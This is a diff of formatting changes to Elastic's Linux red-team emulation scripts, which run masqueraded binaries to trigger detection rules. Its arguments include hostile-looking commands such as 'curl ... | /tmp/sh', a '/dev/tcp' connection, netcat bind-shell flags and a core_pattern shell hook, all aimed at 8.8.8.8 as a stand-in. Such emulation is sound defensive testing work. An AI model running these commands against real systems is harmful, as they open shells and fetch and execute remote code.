diff --git a/rta/linux_command_and_control_cupsd_foomatic_rip_netcon.py b/rta/linux_command_and_control_cupsd_foomatic_rip_netcon.py index fc823dbd5..372cb3e03 100644 --- a/rta/linux_command_and_control_cupsd_foomatic_rip_netcon.py +++ b/rta/linux_command_and_control_cupsd_foomatic_rip_netcon.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -21,27 +22,18 @@ metadata = RtaMetadata( @common.requires_os(*metadata.platforms) def main() -> None: - # Path for the fake executable + # Path for the fake motd executable masquerade = "/tmp/foomatic-rip" source = common.get_path("bin", "netcon_exec_chain.elf") - common.log("Creating a fake executable..") + common.log("Creating a fake motd executable..") common.copy_file(source, masquerade) common.log("Granting execute permissions...") - common.execute(['chmod', '+x', masquerade]) + common.execute(["chmod", "+x", masquerade]) - # Execute the fake executable - common.log("Executing the fake executable..") - commands = [ - masquerade, - 'chain', - '-h', - '8.8.8.8', - '-p', - '53', - '-c', - '/tmp/foomatic-rip netcon -h 8.8.8.8 -p 53' - ] + # Execute the fake motd executable + common.log("Executing the fake motd executable..") + commands = [masquerade, "chain", "-h", "8.8.8.8", "-p", "53", "-c", "/tmp/foomatic-rip netcon -h 8.8.8.8 -p 53"] common.execute([*commands], timeout=5, kill=True) # Cleanup diff --git a/rta/linux_command_and_control_curl_wget_hidden_directory_output.py b/rta/linux_command_and_control_curl_wget_hidden_directory_output.py index 628a43be6..87c48bc3f 100644 --- a/rta/linux_command_and_control_curl_wget_hidden_directory_output.py +++ b/rta/linux_command_and_control_curl_wget_hidden_directory_output.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( diff --git a/rta/linux_defense_evasion_lolbin_so_load.py b/rta/linux_defense_evasion_lolbin_so_load.py index 43c1b6195..bacfd9929 100644 --- a/rta/linux_defense_evasion_lolbin_so_load.py +++ b/rta/linux_defense_evasion_lolbin_so_load.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -29,7 +30,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade]) - commands = [masquerade, 'cdll.LoadLibrary.so'] + commands = [masquerade, "cdll.LoadLibrary.so"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_defense_evasion_process_masquerading_via_exec.py b/rta/linux_defense_evasion_process_masquerading_via_exec.py index 2cf4ea132..6029d6872 100644 --- a/rta/linux_defense_evasion_process_masquerading_via_exec.py +++ b/rta/linux_defense_evasion_process_masquerading_via_exec.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( diff --git a/rta/linux_defense_evasion_proxy_execution_via_crash.py b/rta/linux_defense_evasion_proxy_execution_via_crash.py index 88b959989..860087288 100644 --- a/rta/linux_defense_evasion_proxy_execution_via_crash.py +++ b/rta/linux_defense_evasion_proxy_execution_via_crash.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -35,7 +36,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade2]) - commands = [masquerade, '-h', masquerade, '-c', 'whoami'] + commands = [masquerade, "-h", masquerade, "-c", "whoami"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_defense_evasion_proxy_execution_via_ld_so.py b/rta/linux_defense_evasion_proxy_execution_via_ld_so.py index 7101a8bdf..1ce3e5340 100644 --- a/rta/linux_defense_evasion_proxy_execution_via_ld_so.py +++ b/rta/linux_defense_evasion_proxy_execution_via_ld_so.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -35,7 +36,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade2]) - commands = [masquerade, masquerade, '-c', 'whoami'] + commands = [masquerade, masquerade, "-c", "whoami"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_defense_evasion_proxy_execution_via_php.py b/rta/linux_defense_evasion_proxy_execution_via_php.py index ae8214c9d..91fcc4d12 100644 --- a/rta/linux_defense_evasion_proxy_execution_via_php.py +++ b/rta/linux_defense_evasion_proxy_execution_via_php.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -35,7 +36,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade2]) - commands = [masquerade, '-r', masquerade2, '-c', 'whoami'] + commands = [masquerade, "-r", masquerade2, "-c", "whoami"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_defense_evasion_proxy_execution_via_pidstat.py b/rta/linux_defense_evasion_proxy_execution_via_pidstat.py index d498e6fee..275950de9 100644 --- a/rta/linux_defense_evasion_proxy_execution_via_pidstat.py +++ b/rta/linux_defense_evasion_proxy_execution_via_pidstat.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -35,7 +36,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade2]) - commands = [masquerade, '-e', masquerade, '-c', 'whoami'] + commands = [masquerade, "-e", masquerade, "-c", "whoami"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_defense_evasion_proxy_execution_via_sed.py b/rta/linux_defense_evasion_proxy_execution_via_sed.py index c0600820b..a1952e334 100644 --- a/rta/linux_defense_evasion_proxy_execution_via_sed.py +++ b/rta/linux_defense_evasion_proxy_execution_via_sed.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -35,7 +36,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade2]) - commands = [masquerade, '-n', masquerade, '-c', 'whoami'] + commands = [masquerade, "-n", masquerade, "-c", "whoami"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_defense_evasion_proxy_execution_via_split.py b/rta/linux_defense_evasion_proxy_execution_via_split.py index 80f3c9e10..1bace233a 100644 --- a/rta/linux_defense_evasion_proxy_execution_via_split.py +++ b/rta/linux_defense_evasion_proxy_execution_via_split.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -35,7 +36,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade2]) - commands = [masquerade, masquerade, '--filter=foo', '-c', 'whoami'] + commands = [masquerade, masquerade, "--filter=foo", "-c", "whoami"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_defense_evasion_proxy_execution_via_sysctl.py b/rta/linux_defense_evasion_proxy_execution_via_sysctl.py index 0e7cb1764..2ec2dd81d 100644 --- a/rta/linux_defense_evasion_proxy_execution_via_sysctl.py +++ b/rta/linux_defense_evasion_proxy_execution_via_sysctl.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -35,7 +36,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade2]) - commands = [masquerade, masquerade, 'kernel.core_pattern=/bin/sh -c'] + commands = [masquerade, masquerade, "kernel.core_pattern=/bin/sh -c"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_defense_evasion_proxy_execution_via_tcpdump.py b/rta/linux_defense_evasion_proxy_execution_via_tcpdump.py index 5e38099bc..98c123e53 100644 --- a/rta/linux_defense_evasion_proxy_execution_via_tcpdump.py +++ b/rta/linux_defense_evasion_proxy_execution_via_tcpdump.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -29,7 +30,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade]) - commands = [masquerade, '-W', '-w', '-z'] + commands = [masquerade, "-W", "-w", "-z"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_defense_evasion_shebang_decoded_via_builtin_utility.py b/rta/linux_defense_evasion_shebang_decoded_via_builtin_utility.py index 714456fa0..14bd64ad7 100644 --- a/rta/linux_defense_evasion_shebang_decoded_via_builtin_utility.py +++ b/rta/linux_defense_evasion_shebang_decoded_via_builtin_utility.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -29,7 +30,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade]) - commands = [masquerade, '-d', 'IyEvdXNyL2Jpbi9weXRob24'] + commands = [masquerade, "-d", "IyEvdXNyL2Jpbi9weXRob24"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_defense_evasion_sysctl_kernel_feature_activity.py b/rta/linux_defense_evasion_sysctl_kernel_feature_activity.py index 1e94ded02..73efabed4 100644 --- a/rta/linux_defense_evasion_sysctl_kernel_feature_activity.py +++ b/rta/linux_defense_evasion_sysctl_kernel_feature_activity.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -29,7 +30,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade]) - commands = [masquerade, "--write", '/proc/sys/kernel/yama/ptrace_scope'] + commands = [masquerade, "--write", "/proc/sys/kernel/yama/ptrace_scope"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_execution_bind_shell_via_nc_traditional.py b/rta/linux_execution_bind_shell_via_nc_traditional.py index c9819f01b..540ada358 100644 --- a/rta/linux_execution_bind_shell_via_nc_traditional.py +++ b/rta/linux_execution_bind_shell_via_nc_traditional.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -29,7 +30,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade]) - commands = [masquerade, '-e', '-l', '-p', '/bin/sh'] + commands = [masquerade, "-e", "-l", "-p", "/bin/sh"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_execution_bind_shell_via_node.py b/rta/linux_execution_bind_shell_via_node.py index 8d53995fd..ddfe87fc7 100644 --- a/rta/linux_execution_bind_shell_via_node.py +++ b/rta/linux_execution_bind_shell_via_node.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -29,7 +30,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade]) - commands = [masquerade, '-e', 'spawnsh', 'listen'] + commands = [masquerade, "-e", "spawnsh", "listen"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_execution_bind_shell_via_socket.py b/rta/linux_execution_bind_shell_via_socket.py index b1efd687d..b85f0b234 100644 --- a/rta/linux_execution_bind_shell_via_socket.py +++ b/rta/linux_execution_bind_shell_via_socket.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -29,7 +30,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade]) - commands = [masquerade, '-s', '-p', 'sh'] + commands = [masquerade, "-s", "-p", "sh"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_execution_cupsd_foomatic_rip_shell_execution.py b/rta/linux_execution_cupsd_foomatic_rip_shell_execution.py index 8de54685b..3cd491eb2 100644 --- a/rta/linux_execution_cupsd_foomatic_rip_shell_execution.py +++ b/rta/linux_execution_cupsd_foomatic_rip_shell_execution.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -35,7 +36,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade2]) - commands = [masquerade, masquerade2, '-c', 'whoami'] + commands = [masquerade, masquerade2, "-c", "whoami"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_execution_cupsd_foomatic_rip_suspicious_child_execution.py b/rta/linux_execution_cupsd_foomatic_rip_suspicious_child_execution.py index 002de0010..a5158dcc0 100644 --- a/rta/linux_execution_cupsd_foomatic_rip_suspicious_child_execution.py +++ b/rta/linux_execution_cupsd_foomatic_rip_suspicious_child_execution.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( diff --git a/rta/linux_execution_gsocket_activity.py b/rta/linux_execution_gsocket_activity.py index 09ed21467..47761fe3c 100644 --- a/rta/linux_execution_gsocket_activity.py +++ b/rta/linux_execution_gsocket_activity.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -29,7 +30,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade]) - commands = [masquerade, 'gs-netcat'] + commands = [masquerade, "gs-netcat"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_execution_linux_powershell_outbound_network_connection.py b/rta/linux_execution_linux_powershell_outbound_network_connection.py index 9a1a1d4e6..3ebf8bc28 100644 --- a/rta/linux_execution_linux_powershell_outbound_network_connection.py +++ b/rta/linux_execution_linux_powershell_outbound_network_connection.py @@ -3,8 +3,8 @@ # 2.0; you may not use this file except in compliance with the Elastic License # 2.0. -import sys import subprocess +import sys import time from . import RtaMetadata, common @@ -29,22 +29,22 @@ def main() -> None: network_command = "exec 3<>/dev/tcp/8.8.8.8/53" # Create the fake parent process script - with open(parent_process_path, "w") as parent_script: + with open(parent_process_path, "w") as parent_script: # noqa: PTH123 parent_script.write("#!/bin/bash\n") parent_script.write(f"{child_script_path}\n") # Create the child script that will make the network connection - with open(child_script_path, "w") as child_script: + with open(child_script_path, "w") as child_script: # noqa: PTH123 child_script.write("#!/bin/bash\n") child_script.write(f"{network_command}\n") # Make the scripts executable - common.execute(['chmod', '+x', parent_process_path]) - common.execute(['chmod', '+x', child_script_path]) + common.execute(["chmod", "+x", parent_process_path]) + common.execute(["chmod", "+x", child_script_path]) # Execute the parent process script common.log("Executing the fake parent process script") - subprocess.Popen([parent_process_path]) + subprocess.Popen([parent_process_path]) # noqa: S603 # Allow some time for the network connection to be attempted time.sleep(5) diff --git a/rta/linux_execution_reverse_or_bind_shell_via_utility.py b/rta/linux_execution_reverse_or_bind_shell_via_utility.py index faaca08ec..65b3979d9 100644 --- a/rta/linux_execution_reverse_or_bind_shell_via_utility.py +++ b/rta/linux_execution_reverse_or_bind_shell_via_utility.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -29,7 +30,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade]) - commands = [masquerade, '-c', "socket"] + commands = [masquerade, "-c", "socket"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_impact_enable_write_access_to_msr.py b/rta/linux_impact_enable_write_access_to_msr.py index 90b7df179..c46a05b56 100644 --- a/rta/linux_impact_enable_write_access_to_msr.py +++ b/rta/linux_impact_enable_write_access_to_msr.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -29,7 +30,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade]) - commands = [masquerade, 'msr', "allow_writes=on"] + commands = [masquerade, "msr", "allow_writes=on"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_persistence_webserver_curl_wget_download_ip_args.py b/rta/linux_persistence_webserver_curl_wget_download_ip_args.py index 811239ba8..7677ad8c0 100644 --- a/rta/linux_persistence_webserver_curl_wget_download_ip_args.py +++ b/rta/linux_persistence_webserver_curl_wget_download_ip_args.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -29,7 +30,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade]) - commands = [masquerade, '-c', 'curl http://8.8.8.8:53 --output'] + commands = [masquerade, "-c", "curl http://8.8.8.8:53 --output"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_persistence_webserver_curl_wget_piped_to_interpreter.py b/rta/linux_persistence_webserver_curl_wget_piped_to_interpreter.py index 3b46b1631..77ad90d1c 100644 --- a/rta/linux_persistence_webserver_curl_wget_piped_to_interpreter.py +++ b/rta/linux_persistence_webserver_curl_wget_piped_to_interpreter.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -29,7 +30,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade]) - commands = [masquerade, '-c', 'curl http://8.8.8.8:53/foo | /tmp/sh'] + commands = [masquerade, "-c", "curl http://8.8.8.8:53/foo | /tmp/sh"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade) diff --git a/rta/linux_persistence_webserver_curl_wget_suspicious_redirect.py b/rta/linux_persistence_webserver_curl_wget_suspicious_redirect.py index d32448ceb..9decd710e 100644 --- a/rta/linux_persistence_webserver_curl_wget_suspicious_redirect.py +++ b/rta/linux_persistence_webserver_curl_wget_suspicious_redirect.py @@ -4,6 +4,7 @@ # 2.0. import sys + from . import RtaMetadata, common metadata = RtaMetadata( @@ -29,7 +30,7 @@ def main() -> None: common.log("Granting execute permissions...") common.execute(["chmod", "+x", masquerade]) - commands = [masquerade, '-c', 'curl http://8.8.8.8:53/foo > /tmp/foo && xxd'] + commands = [masquerade, "-c", "curl http://8.8.8.8:53/foo > /tmp/foo && xxd"] common.execute([*commands], timeout=5, kill=True) common.log("Cleaning...") common.remove_file(masquerade)